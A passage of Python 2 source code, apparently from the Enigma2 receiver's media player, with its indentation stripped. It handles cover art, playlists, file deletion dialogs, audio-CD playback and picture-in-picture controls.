self.picload.PictureData.get().append(self.paintCoverArtPixmapCB)
self.coverFileNames = ["folder.png", "folder.jpg"]
def applySkin(self, desktop, screen):
from Tools.LoadPixmap import LoadPixmap
noCoverFile = None
if self.skinAttributes is not None:
for (attrib, value) in self.skinAttributes:
if attrib == "pixmap":
noCoverFile = value
break
if noCoverFile is None:
noCoverFile = resolveFilename(SCOPE_CURRENT_SKIN, "no_coverArt.png")
self.noCoverPixmap = LoadPixmap(noCoverFile)
return Pixmap.applySkin(self, desktop, screen)
def onShow(self):
Pixmap.onShow(self)
sc = AVSwitch().getFramebufferScale()
#0=Width 1=Height 2=Aspect 3=use_cache 4=resize_type 5=Background(#AARRGGBB)
self.picload.setPara((self.instance.size().width(), self.instance.size().height(), sc[0], sc[1], False, 1, "#00000000"))
def paintCoverArtPixmapCB(self, picInfo=None):
ptr = self.picload.getData()
if ptr is not None:
self.instance.setPixmap(ptr.__deref__())
def updateCoverArt(self, path):
while not path.endswith("/"):
path = path[:-1]
new_coverArtFileName = None
for filename in self.coverFileNames:
if fileExists(path + filename):
new_coverArtFileName = path + filename
if self.coverArtFileName != new_coverArtFileName:
self.coverArtFileName = new_coverArtFileName
if new_coverArtFileName:
self.picload.startDecode(self.coverArtFileName)
else:
self.showDefaultCover()
def showDefaultCover(self):
self.instance.setPixmap(self.noCoverPixmap)
def embeddedCoverArt(self):
print "[embeddedCoverArt] found"
self.coverArtFileName = "/tmp/.id3coverart"
self.picload.startDecode(self.coverArtFileName)
class MediaPlayerInfoBar(Screen):
def __init__(self, session):
Screen.__init__(self, session)
self.skinName = "MoviePlayer"
class MediaPlayer(Screen, InfoBarBase, InfoBarScreenSaver, InfoBarSeek, InfoBarAudioSelection, InfoBarCueSheetSupport, InfoBarNotifications, InfoBarSubtitleSupport, HelpableScreen):
ALLOW_SUSPEND = True
ENABLE_RESUME_SUPPORT = True
FLAG_CENTER_DVB_SUBS = 2048
def __init__(self, session, args = None):
Screen.__init__(self, session)
InfoBarAudioSelection.__init__(self)
InfoBarCueSheetSupport.__init__(self, actionmap = "MediaPlayerCueSheetActions")
InfoBarNotifications.__init__(self)
InfoBarBase.__init__(self)
InfoBarScreenSaver.__init__(self)
InfoBarSubtitleSupport.__init__(self)
HelpableScreen.__init__(self)
self.summary = None
self.oldService = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.session.nav.stopService()
self.setTitle(_("Media player"))
self.playlistparsers = {}
self.addPlaylistParser(PlaylistIOM3U, "m3u")
self.addPlaylistParser(PlaylistIOPLS, "pls")
self.addPlaylistParser(PlaylistIOInternal, "e2pls")
# 'None' is magic to start at the list of mountpoints
defaultDir = config.mediaplayer.defaultDir.getValue()
self.filelist = FileList(defaultDir, matchingPattern = "(?i)^.*\.(dts|mp3|wav|wave|wv|oga|ogg|flac|m4a|mp2|m2a|wma|ac3|mka|aac|ape|alac|mpg|vob|m4v|mkv|avi|divx|dat|flv|mp4|mov|wmv|asf|3gp|3g2|mpeg|mpe|rm|rmvb|ogm|ogv|m2ts|mts|ts|m3u|e2pls|pls|amr|au|mid|pva|wtv)", useServiceRef = True, additionalExtensions = "4098:m3u 4098:e2pls 4098:pls")
self["filelist"] = self.filelist
self.playlist = MyPlayList()
self.is_closing = False
self.delname = ""
self.playlistname = ""
self["playlist"] = self.playlist
self["PositionGauge"] = ServicePositionGauge(self.session.nav)
self["currenttext"] = Label("")
self["artisttext"] = Label(_("Artist")+':')
self["artist"] = Label("")
self["titletext"] = Label(_("Title")+':')
self["title"] = Label("")
self["albumtext"] = Label(_("Album")+':')
self["album"] = Label("")
self["yeartext"] = Label(_("Year")+':')
self["year"] = Label("")
self["genretext"] = Label(_("Genre")+':')
self["genre"] = Label("")
self["coverArt"] = MediaPixmap()
self["repeat"] = MultiPixmap()
self.seek_target = None
try:
from Plugins.SystemPlugins.Hotplug.plugin import hotplugNotifier
hotplugNotifier.append(self.hotplugCB)
except Exception, ex:
print "[MediaPlayer] No hotplug support", ex
class MoviePlayerActionMap(NumberActionMap):
def __init__(self, player, contexts = [ ], actions = { }, prio=0):
NumberActionMap.__init__(self, contexts, actions, prio)
self.player = player
def action(self, contexts, action):
self.player.show()
return NumberActionMap.action(self, contexts, action)
self["OkCancelActions"] = HelpableActionMap(self, "OkCancelActions",
{
"ok": (self.ok, _("Add file to playlist")),
"cancel": (self.exit, _("Exit mediaplayer")),
}, -2)
self["MediaPlayerActions"] = HelpableActionMap(self, "MediaPlayerActions",
{
"play": (self.xplayEntry, _("Play entry")),
"pause": (self.pauseEntry, _("Pause")),
"stop": (self.stopEntry, _("Stop entry")),
"previous": (self.previousMarkOrEntry, _("Play from previous mark or playlist entry")),
"next": (self.nextMarkOrEntry, _("Play from next mark or playlist entry")),
"menu": (self.showMenu, _("Menu")),
"skipListbegin": (self.skip_listbegin, _("Jump to beginning of list")),
"skipListend": (self.skip_listend, _("Jump to end of list")),
"prevBouquet": (self.prevBouquet, self.prevBouquetHelpText),
"nextBouquet": (self.nextBouquet, self.nextBouquetHelptext),
"delete": (self.deletePlaylistEntry, _("Delete playlist entry")),
"shift_stop": (self.clear_playlist, _("Clear playlist")),
"shift_record": (self.playlist.PlayListShuffle, _("Shuffle playlist")),
"subtitles": (self.subtitleSelection, _("Subtitle selection")),
}, -2)
self["InfobarEPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"showEventInfo": (self.showEventInformation, _("show event details")),
})
self["actions"] = MoviePlayerActionMap(self, ["DirectionActions"],
{
"right": self.rightDown,
"rightRepeated": self.doNothing,
"rightUp": self.rightUp,
"left": self.leftDown,
"leftRepeated": self.doNothing,
"leftUp": self.leftUp,
"up": self.up,
"upRepeated": self.up,
"upUp": self.doNothing,
"down": self.down,
"downRepeated": self.down,
"downUp": self.doNothing,
}, -2)
InfoBarSeek.__init__(self, actionmap = "MediaPlayerSeekActions")
self.mediaPlayerInfoBar = self.session.instantiateDialog(MediaPlayerInfoBar)
self.onClose.append(self.delMPTimer)
self.onClose.append(self.__onClose)
self.onShow.append(self.timerHideMediaPlayerInfoBar)
self.righttimer = False
self.rightKeyTimer = eTimer()
self.rightKeyTimer.callback.append(self.rightTimerFire)
self.lefttimer = False
self.leftKeyTimer = eTimer()
self.leftKeyTimer.callback.append(self.leftTimerFire)
self.hideMediaPlayerInfoBar = eTimer()
self.hideMediaPlayerInfoBar.callback.append(self.timerHideMediaPlayerInfoBar)
self.currList = "filelist"
self.isAudioCD = False
self.ext = None
self.AudioCD_albuminfo = {}
self.cdAudioTrackFiles = []
self.onShown.append(self.applySettings)
self.playlistIOInternal = PlaylistIOInternal()
list = self.playlistIOInternal.open(resolveFilename(SCOPE_CONFIG, "playlist.e2pls"))
if list:
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedInfo: self.__evUpdatedInfo,
iPlayableService.evUser+10: self.__evAudioDecodeError,
iPlayableService.evUser+11: self.__evVideoDecodeError,
iPlayableService.evUser+12: self.__evPluginError,
iPlayableService.evUser+13: self["coverArt"].embeddedCoverArt
})
self.servicelist = None
self.pipZapAvailable = False
if InfoBar.instance is not None:
self.servicelist = InfoBar.instance.servicelist
if self.servicelist and hasattr(self.servicelist, 'dopipzap'):
self.pipZapAvailable = SystemInfo.get("NumVideoDecoders", 1) > 1
def prevBouquetHelpText(self):
if not self.shown and self.isPiPzap():
value = _("when PiPzap enabled zap channel up...")
else:
value = _("Switch between filelist/playlist")
return value
def nextBouquetHelptext(self):
if not self.shown and self.isPiPzap():
value = _("when PiPzap enabled zap channel down...")
else:
value = _("Switch between filelist/playlist")
return value
def hideAndInfoBar(self):
self.hide()
self.mediaPlayerInfoBar.show()
if config.mediaplayer.alwaysHideInfoBar.value or self.ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideMediaPlayerInfoBar.start(5000, True)
def timerHideMediaPlayerInfoBar(self):
self.hideMediaPlayerInfoBar.stop()
self.mediaPlayerInfoBar.hide()
def doNothing(self):
pass
def createSummary(self):
return MediaPlayerLCDScreen
def exit(self):
if self.mediaPlayerInfoBar.shown:
self.timerHideMediaPlayerInfoBar()
else:
self.session.openWithCallback(self.exitCallback, MessageBox, _("Exit media player?"), simple = not self.shown)
def exitCallback(self, answer):
if answer:
self.playlistIOInternal.clear()
for x in self.playlist.list:
self.playlistIOInternal.addService(ServiceReference(x[0]))
if self.savePlaylistOnExit:
try:
self.playlistIOInternal.save(resolveFilename(SCOPE_CONFIG, "playlist.e2pls"))
except IOError:
print "couldn't save playlist.e2pls"
if config.mediaplayer.saveDirOnExit.getValue():
config.mediaplayer.defaultDir.setValue(self.filelist.getCurrentDirectory())
config.mediaplayer.defaultDir.save()
try:
from Plugins.SystemPlugins.Hotplug.plugin import hotplugNotifier
hotplugNotifier.remove(self.hotplugCB)
except:
pass
del self["coverArt"].picload
self.close()
def checkSkipShowHideLock(self):
self.updatedSeekState()
def doEofInternal(self, playing):
if playing:
self.nextEntry()
else:
self.show()
def __onClose(self):
self.mediaPlayerInfoBar.doClose()
self.session.nav.playService(self.oldService)
def __evUpdatedInfo(self):
currPlay = self.session.nav.getCurrentService()
sTagTrackNumber = currPlay.info().getInfo(iServiceInformation.sTagTrackNumber)
sTagTrackCount = currPlay.info().getInfo(iServiceInformation.sTagTrackCount)
sTagTitle = currPlay.info().getInfoString(iServiceInformation.sTagTitle)
if sTagTrackNumber or sTagTrackCount or sTagTitle:
print "[__evUpdatedInfo] title %d of %d (%s)" % (sTagTrackNumber, sTagTrackCount, sTagTitle)
self.readTitleInformation()
def __evAudioDecodeError(self):
currPlay = self.session.nav.getCurrentService()
sTagAudioCodec = currPlay.info().getInfoString(iServiceInformation.sTagAudioCodec)
print "[__evAudioDecodeError] audio-codec %s can't be decoded by hardware" % (sTagAudioCodec)
self.session.open(MessageBox, _("This receiver cannot decode %s streams!") % sTagAudioCodec, type = MessageBox.TYPE_INFO,timeout = 20 )
def __evVideoDecodeError(self):
currPlay = self.session.nav.getCurrentService()
sTagVideoCodec = currPlay.info().getInfoString(iServiceInformation.sTagVideoCodec)
print "[__evVideoDecodeError] video-codec %s can't be decoded by hardware" % (sTagVideoCodec)
self.session.open(MessageBox, _("This receiver cannot decode %s streams!") % sTagVideoCodec, type = MessageBox.TYPE_INFO,timeout = 20 )
def __evPluginError(self):
currPlay = self.session.nav.getCurrentService()
message = currPlay.info().getInfoString(iServiceInformation.sUser+12)
print "[__evPluginError]" , message
self.session.open(MessageBox, message, type = MessageBox.TYPE_INFO,timeout = 20 )
def delMPTimer(self):
del self.rightKeyTimer
del self.leftKeyTimer
def readTitleInformation(self):
currPlay = self.session.nav.getCurrentService()
if currPlay is not None:
sTitle = currPlay.info().getInfoString(iServiceInformation.sTagTitle)
sAlbum = currPlay.info().getInfoString(iServiceInformation.sTagAlbum)
sGenre = currPlay.info().getInfoString(iServiceInformation.sTagGenre)
sArtist = currPlay.info().getInfoString(iServiceInformation.sTagArtist)
sYear = currPlay.info().getInfoString(iServiceInformation.sTagDate)
if sTitle == "":
if not self.isAudioCD:
sTitle = currPlay.info().getName().split('/')[-1]
else:
sTitle = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()].getName()
if self.AudioCD_albuminfo:
if sAlbum == "" and "title" in self.AudioCD_albuminfo:
sAlbum = self.AudioCD_albuminfo["title"]
if sGenre == "" and "genre" in self.AudioCD_albuminfo:
sGenre = self.AudioCD_albuminfo["genre"]
if sArtist == "" and "artist" in self.AudioCD_albuminfo:
sArtist = self.AudioCD_albuminfo["artist"]
if "year" in self.AudioCD_albuminfo:
sYear = self.AudioCD_albuminfo["year"]
self.updateMusicInformation( sArtist, sTitle, sAlbum, sYear, sGenre, clear = True )
else:
self.updateMusicInformation()
def updateMusicInformation(self, artist = "", title = "", album = "", year = "", genre = "", clear = False):
self.updateSingleMusicInformation("artist", artist, clear)
self.updateSingleMusicInformation("title", title, clear)
self.updateSingleMusicInformation("album", album, clear)
self.updateSingleMusicInformation("year", year, clear)
self.updateSingleMusicInformation("genre", genre, clear)
def updateSingleMusicInformation(self, name, info, clear):
if info != "" or clear:
if self[name].getText() != info:
self[name].setText(info)
def leftDown(self):
self.lefttimer = True
self.leftKeyTimer.start(1000)
def rightDown(self):
self.righttimer = True
self.rightKeyTimer.start(1000)
def leftUp(self):
if self.lefttimer:
self.leftKeyTimer.stop()
self.lefttimer = False
self[self.currList].pageUp()
self.updateCurrentInfo()
def rightUp(self):
if self.righttimer:
self.rightKeyTimer.stop()
self.righttimer = False
self[self.currList].pageDown()
self.updateCurrentInfo()
def leftTimerFire(self):
self.leftKeyTimer.stop()
self.lefttimer = False
self.switchToFileList()
def rightTimerFire(self):
self.rightKeyTimer.stop()
self.righttimer = False
self.switchToPlayList()
def switchToFileList(self):
self.currList = "filelist"
self.filelist.selectionEnabled(1)
self.playlist.selectionEnabled(0)
self.updateCurrentInfo()
def switchToPlayList(self):
if len(self.playlist) != 0:
self.currList = "playlist"
self.filelist.selectionEnabled(0)
self.playlist.selectionEnabled(1)
self.updateCurrentInfo()
def up(self):
self[self.currList].up()
self.updateCurrentInfo()
def down(self):
self[self.currList].down()
self.updateCurrentInfo()
def showAfterSeek(self):
if not self.shown:
self.hideAndInfoBar()
def showAfterCuesheetOperation(self):
self.show()
def hideAfterResume(self):
self.hideAndInfoBar()
def getIdentifier(self, ref):
if self.isAudioCD:
return ref.getName()
else:
text = ref.getPath()
return text.split('/')[-1]
# FIXME: maybe this code can be optimized
def updateCurrentInfo(self):
text = ""
if self.currList == "filelist":
idx = self.filelist.getSelectionIndex()
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
if len(text) < 2:
text += " "
if text[:2] != "..":
text = "/" + text
self.summaries.setText(text,1)
idx += 1
if idx < len(self.filelist.list):
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
text = "/" + text
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.filelist.list):
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
text = "/" + text
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
text = ""
if not self.filelist.canDescent():
r = self.filelist.getServiceRef()
if r is None:
return
text = r.getPath()
self["currenttext"].setText(os.path.basename(text))
if self.currList == "playlist":
t = self.playlist.getSelection()
if t is None:
return
#display current selected entry on LCD
text = self.getIdentifier(t)
self.summaries.setText(text,1)
self["currenttext"].setText(text)
idx = self.playlist.getSelectionIndex()
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
def ok(self):
if self.currList == "filelist":
if self.filelist.canDescent():
self.filelist.descent()
self.updateCurrentInfo()
else:
self.copyFile()
if self.currList == "playlist":
if self.playlist.getCurrentIndex() == self.playlist.getSelectionIndex() and not self.playlist.isStopped():
if self.shown:
self.hideAndInfoBar()
elif self.mediaPlayerInfoBar.shown:
self.mediaPlayerInfoBar.hide()
self.hideMediaPlayerInfoBar.stop()
if self.ext in AUDIO_EXTENSIONS or self.isAudioCD:
self.show()
else:
self.mediaPlayerInfoBar.show()
else:
self.changeEntry(self.playlist.getSelectionIndex())
def showMenu(self):
menu = []
if len(self.cdAudioTrackFiles):
menu.insert(0,(_("Play audio-CD..."), "audiocd"))
if self.currList == "filelist":
if self.filelist.canDescent():
menu.append((_("Add directory to playlist"), "copydir"))
else:
menu.append((_("Add files to playlist"), "copyfiles"))
menu.append((_("Switch to playlist"), "playlist"))
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Delete file"), "deletefile"))
else:
menu.append((_("Switch to filelist"), "filelist"))
menu.append((_("Clear playlist"), "clear"))
menu.append((_("Delete entry"), "deleteentry"))
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Shuffle playlist"), "shuffle"))
menu.append((_("Hide player"), "hide"))
menu.append((_("Load playlist"), "loadplaylist"));
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Save playlist"), "saveplaylist"))
menu.append((_("Delete saved playlist"), "deleteplaylist"))
menu.append((_("Edit settings"), "settings"))
if self.pipZapAvailable:
menu.append((_("Menu") + " PiP", "pip"))
if self.isPiPzap():
menu.append((_("Open service list"), "servicelist"))
self.timerHideMediaPlayerInfoBar()
self.session.openWithCallback(self.menuCallback, ChoiceBox, title="", list=menu)
def menuCallback(self, choice):
self.show()
if choice is None:
return
if choice[1] == "copydir":
self.copyDirectory(self.filelist.getSelection()[0])
elif choice[1] == "copyfiles":
self.copyDirectory(os.path.dirname(self.filelist.getSelection()[0].getPath()) + "/", recursive = False)
elif choice[1] == "playlist":
self.switchToPlayList()
elif choice[1] == "filelist":
self.switchToFileList()
elif choice[1] == "deleteentry":
if self.playlist.getSelectionIndex() == self.playlist.getCurrentIndex():
self.stopEntry()
self.deleteEntry()
elif choice[1] == "clear":
self.clear_playlist()
elif choice[1] == "hide":
self.hideAndInfoBar()
elif choice[1] == "saveplaylist":
self.save_playlist()
elif choice[1] == "loadplaylist":
self.load_playlist()
elif choice[1] == "deleteplaylist":
self.delete_saved_playlist()
elif choice[1] == "shuffle":
self.playlist.PlayListShuffle()
elif choice[1] == "deletefile":
self.deleteFile()
elif choice[1] == "settings":
self.session.openWithCallback(self.applySettings, MediaPlayerSettings, self)
elif choice[1] == "audiocd":
self.playAudioCD()
elif choice[1] == "pip":
self.activatePiP()
elif choice[1] == "servicelist":
self.openServiceList()
def playAudioCD(self):
from enigma import eServiceReference
if len(self.cdAudioTrackFiles):
self.playlist.clear()
self.savePlaylistOnExit = False
self.isAudioCD = True
for x in self.cdAudioTrackFiles:
ref = eServiceReference(4097, 0, x)
self.playlist.addFile(ref)
try:
from Plugins.Extensions.CDInfo.plugin import Query
cdinfo = Query(self)
cdinfo.scan()
except ImportError:
pass # we can live without CDInfo
self.changeEntry(0)
self.switchToPlayList()
def applySettings(self, answer=True):
if answer is True:
self.savePlaylistOnExit = config.mediaplayer.savePlaylistOnExit.getValue()
if config.mediaplayer.repeat.getValue() == True:
self["repeat"].setPixmapNum(1)
else:
self["repeat"].setPixmapNum(0)
def showEventInformation(self):
from Screens.EventView import EventViewSimple
from ServiceReference import ServiceReference
evt = self[self.currList].getCurrentEvent()
if evt:
self.session.open(EventViewSimple, evt, ServiceReference(self.getCurrent()))
# also works on filelist (?)
def getCurrent(self):
return self["playlist"].getCurrent()
def deletePlaylistEntry(self):
if self.currList == "playlist":
if self.playlist.getSelectionIndex() == self.playlist.getCurrentIndex():
self.stopEntry()
self.deleteEntry()
def skip_listbegin(self):
if self.currList == "filelist":
self.filelist.moveToIndex(0)
else:
self.playlist.moveToIndex(0)
self.updateCurrentInfo()
def skip_listend(self):
if self.currList == "filelist":
idx = len(self.filelist.list)
self.filelist.moveToIndex(idx - 1)
else:
self.playlist.moveToIndex(len(self.playlist)-1)
self.updateCurrentInfo()
def save_playlist(self):
self.session.openWithCallback(self.save_playlist2,InputBox, title=_("Please enter filename (empty = use current date)"),windowTitle = _("Save playlist"), text=self.playlistname)
def save_playlist2(self, name):
if name is not None:
name = name.strip()
if name == "":
name = time.strftime("%y%m%d_%H%M%S")
self.playlistname = name
name += ".e2pls"
self.playlistIOInternal.clear()
for x in self.playlist.list:
self.playlistIOInternal.addService(ServiceReference(x[0]))
self.playlistIOInternal.save(resolveFilename(SCOPE_PLAYLIST) + name)
def get_playlists(self):
listpath = []
playlistdir = resolveFilename(SCOPE_PLAYLIST)
try:
for i in os.listdir(playlistdir):
listpath.append((i,playlistdir + i))
except IOError,e:
print "Error while scanning subdirs ",e
if config.mediaplayer.sortPlaylists.value:
listpath.sort()
return listpath
def load_playlist(self):
listpath = self.get_playlists()
if listpath:
self.session.openWithCallback(self.PlaylistSelected, ChoiceBox, title=_("Please select a playlist..."), list = listpath)
else:
self.session.open(MessageBox, _("There are no saved playlists to load!"), MessageBox.TYPE_ERROR)
def PlaylistSelected(self,path):
if path is not None:
self.playlistname = path[0].rsplit('.',1)[-2]
self.clear_playlist()
extension = path[0].rsplit('.',1)[-1]
if extension in self.playlistparsers:
playlist = self.playlistparsers[extension]()
list = playlist.open(path[1])
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
def delete_saved_playlist(self):
listpath = self.get_playlists()
if listpath:
self.session.openWithCallback(self.DeletePlaylistSelected, ChoiceBox, title=_("Please select a playlist to delete..."), list = listpath)
else:
self.session.open(MessageBox, _("There are no saved playlists to delete!"), MessageBox.TYPE_ERROR)
def DeletePlaylistSelected(self,path):
if path is not None:
self.delname = path[1]
self.session.openWithCallback(self.deleteConfirmed, MessageBox, _("Do you really want to delete %s?") % (path[1]))
def deleteConfirmed(self, confirmed):
if confirmed:
try:
os.remove(self.delname)
except OSError,e:
print "delete failed:", e
self.session.open(MessageBox, _("Delete failed!"), MessageBox.TYPE_ERROR)
def clear_playlist(self):
self.isAudioCD = False
self.stopEntry()
self.playlist.clear()
self.switchToFileList()
def copyDirectory(self, directory, recursive = True):
print "copyDirectory", directory
if directory == '/':
print "refusing to operate on /"
return
filelist = FileList(directory, useServiceRef = True, showMountpoints = False, isTop = True)
for x in filelist.getFileList():
if x[0][1] == True: #isDir
if recursive:
if x[0][0] != directory:
self.copyDirectory(x[0][0])
elif filelist.getServiceRef() and filelist.getServiceRef().type == 4097:
self.playlist.addFile(x[0][0])
self.playlist.updateList()
def deleteFile(self):
if self.currList == "filelist":
self.service = self.filelist.getServiceRef()
else:
self.service = self.playlist.getSelection()
if self.service is None:
return
if self.service.type != 4098 and self.session.nav.getCurrentlyPlayingServiceReference() is not None:
if self.service == self.session.nav.getCurrentlyPlayingServiceReference():
self.stopEntry()
serviceHandler = eServiceCenter.getInstance()
offline = serviceHandler.offlineOperations(self.service)
info = serviceHandler.info(self.service)
name = info and info.getName(self.service)
result = False
if offline is not None:
# simulate first
if not offline.deleteFromDisk(1):
result = True
if result == True:
self.session.openWithCallback(self.deleteConfirmed_offline, MessageBox, _("Do you really want to delete %s?") % (name))
else:
self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
def deleteConfirmed_offline(self, confirmed):
if confirmed:
serviceHandler = eServiceCenter.getInstance()
offline = serviceHandler.offlineOperations(self.service)
result = False
if offline is not None:
# really delete!
if not offline.deleteFromDisk(0):
result = True
if result == False:
self.session.open(MessageBox, _("Delete failed!"), MessageBox.TYPE_ERROR)
else:
self.removeListEntry()
def removeListEntry(self):
currdir = self.filelist.getCurrentDirectory()
self.filelist.changeDir(currdir)
deleteend = False
while not deleteend:
index = 0
deleteend = True
if len(self.playlist) > 0:
for x in self.playlist.list:
if self.service == x[0]:
self.playlist.deleteFile(index)
deleteend = False
break
index += 1
self.playlist.updateList()
if self.currList == "playlist":
if len(self.playlist) == 0:
self.switchToFileList()
def copyFile(self):
if self.filelist.getServiceRef().type == 4098: # playlist
ServiceRef = self.filelist.getServiceRef()
extension = ServiceRef.getPath()[ServiceRef.getPath().rfind('.') + 1:]
if extension in self.playlistparsers:
playlist = self.playlistparsers[extension]()
list = playlist.open(ServiceRef.getPath())
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
else:
self.playlist.addFile(self.filelist.getServiceRef())
self.playlist.updateList()
if len(self.playlist) == 1:
self.changeEntry(0)
def addPlaylistParser(self, parser, extension):
self.playlistparsers[extension] = parser
def nextEntry(self):
next = self.playlist.getCurrentIndex() + 1
if next < len(self.playlist):
self.changeEntry(next)
elif ( len(self.playlist) > 0 ) and ( config.mediaplayer.repeat.getValue() == True ):
self.stopEntry()
self.changeEntry(0)
elif ( len(self.playlist) > 0 ):
self.stopEntry()
def nextMarkOrEntry(self):
if not self.jumpPreviousNextMark(lambda x: x):
next = self.playlist.getCurrentIndex() + 1
if next < len(self.playlist):
self.changeEntry(next)
else:
self.doSeek(-1)
def previousMarkOrEntry(self):
if not self.jumpPreviousNextMark(lambda x: -x-5*90000, start=True):
next = self.playlist.getCurrentIndex() - 1
if next >= 0:
self.changeEntry(next)
def deleteEntry(self):
self.playlist.deleteFile(self.playlist.getSelectionIndex())
self.playlist.updateList()
if len(self.playlist) == 0:
self.switchToFileList()
def changeEntry(self, index):
self.playlist.setCurrentPlaying(index)
self.playEntry()
def playServiceRefEntry(self, serviceref):
serviceRefList = self.playlist.getServiceRefList()
for count in range(len(serviceRefList)):
if serviceRefList[count] == serviceref:
self.changeEntry(count)
break
def xplayEntry(self):
if self.currList == "playlist":
self.playEntry()
else:
self.stopEntry()
self.playlist.clear()
self.isAudioCD = False
sel = self.filelist.getSelection()
if sel:
if sel[1]: # can descent
# add directory to playlist
self.copyDirectory(sel[0])
else:
# add files to playlist
self.copyDirectory(os.path.dirname(sel[0].getPath()) + "/", recursive = False)
if len(self.playlist) > 0:
self.changeEntry(0)
def playEntry(self):
if len(self.playlist.getServiceRefList()):
needsInfoUpdate = False
currref = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()]
if self.session.nav.getCurrentlyPlayingServiceReference() is None or currref != self.session.nav.getCurrentlyPlayingServiceReference() or self.playlist.isStopped():
self.session.nav.playService(self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()])
info = eServiceCenter.getInstance().info(currref)
description = info and info.getInfoString(currref, iServiceInformation.sDescription) or ""
self["title"].setText(description)
# display just playing musik on LCD
idx = self.playlist.getCurrentIndex()
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.ext = os.path.splitext(text)[1].lower()
text = ">"+text
# FIXME: the information if the service contains video (and we should hide our window) should com from the service instead
if self.ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideAndInfoBar()
else:
needsInfoUpdate = True
self.summaries.setText(text,1)
# get the next two entries
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
else:
idx = self.playlist.getCurrentIndex()
currref = self.playlist.getServiceRefList()[idx]
text = currref.getPath()
ext = os.path.splitext(text)[1].lower()
if self.ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideAndInfoBar()
else:
needsInfoUpdate = True
self.unPauseService()
if needsInfoUpdate == True:
path = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()].getPath()
self["coverArt"].updateCoverArt(path)
else:
self["coverArt"].showDefaultCover()
self.readTitleInformation()
def updatedSeekState(self):
if self.seekstate == self.SEEK_STATE_PAUSE:
self.playlist.pauseFile()
elif self.seekstate == self.SEEK_STATE_PLAY:
self.playlist.playFile()
elif self.isStateForward(self.seekstate):
self.playlist.forwardFile()
elif self.isStateBackward(self.seekstate):
self.playlist.rewindFile()
def pauseEntry(self):
self.pauseService()
if self.seekstate == self.SEEK_STATE_PAUSE:
self.show()
else:
self.hideAndInfoBar()
def stopEntry(self):
self.playlist.stopFile()
self.session.nav.playService(None)
self.updateMusicInformation(clear=True)
self.show()
def unPauseService(self):
self.setSeekState(self.SEEK_STATE_PLAY)
def subtitleSelection(self):
from Screens.AudioSelection import SubtitleSelection
self.session.open(SubtitleSelection, self)
def hotplugCB(self, dev, media_state):
if media_state == "audiocd" or media_state == "audiocdadd":
self.cdAudioTrackFiles = []
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
if list:
self.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
self.cdAudioTrackFiles.append(xnon)
self.playAudioCD()
else:
self.cdAudioTrackFiles = []
if self.isAudioCD:
self.clear_playlist()
else:
self.cdAudioTrackFiles = []
if self.isAudioCD:
self.clear_playlist()
def isPiPzap(self):
return self.pipZapAvailable and self.servicelist and self.servicelist.dopipzap
def openServiceList(self):
if self.isPiPzap():
self.session.execDialog(self.servicelist)
def activatePiP(self):
if self.pipZapAvailable:
if InfoBar.instance is not None:
modeslist = [ ]
keyslist = [ ]
if InfoBar.pipShown(InfoBar.instance):
slist = self.servicelist
if slist:
if slist.dopipzap:
modeslist.append((_("Zap focus to main screen"), "pipzap"))
else:
modeslist.append((_("Zap focus to Picture in Picture"), "pipzap"))
keyslist.append('red')
modeslist.append((_("Move Picture in Picture"), "move"))
keyslist.append('green')
modeslist.append((_("Disable Picture in Picture"), "stop"))
keyslist.append('blue')
else:
modeslist.append((_("Activate Picture in Picture"), "start"))
keyslist.append('blue')
dlg = self.session.openWithCallback(self.pipAnswerConfirmed, ChoiceBox, list = modeslist, keys = keyslist)
dlg.setTitle(_("Menu") + " PiP")
def pipAnswerConfirmed(self, answer):
answer = answer and answer[1]
if answer is not None and InfoBar.instance is not None:
slist = self.servicelist
if answer == "pipzap":
InfoBar.togglePipzap(InfoBar.instance)
elif answer == "move":
InfoBar.movePiP(InfoBar.instance)
elif answer == "stop":
if InfoBar.pipShown(InfoBar.instance):
if slist and slist.dopipzap:
slist.togglePipzap()
if hasattr(self.session, 'pip'):
del self.session.pip
self.session.pipshown = False
elif answer == "start":
prev_playingref = self.session.nav.currentlyPlayingServiceOrGroup
if prev_playingref:
self.session.nav.currentlyPlayingServiceOrGroup = None
InfoBar.showPiP(InfoBar.instance)
if prev_playingref:
self.session.nav.currentlyPlayingServiceOrGroup = prev_playingref
if slist and not slist.dopipzap and hasattr(self.session, 'pip'):
InfoBar.togglePipzap(InfoBar.instance)
def nextBouquet(self):
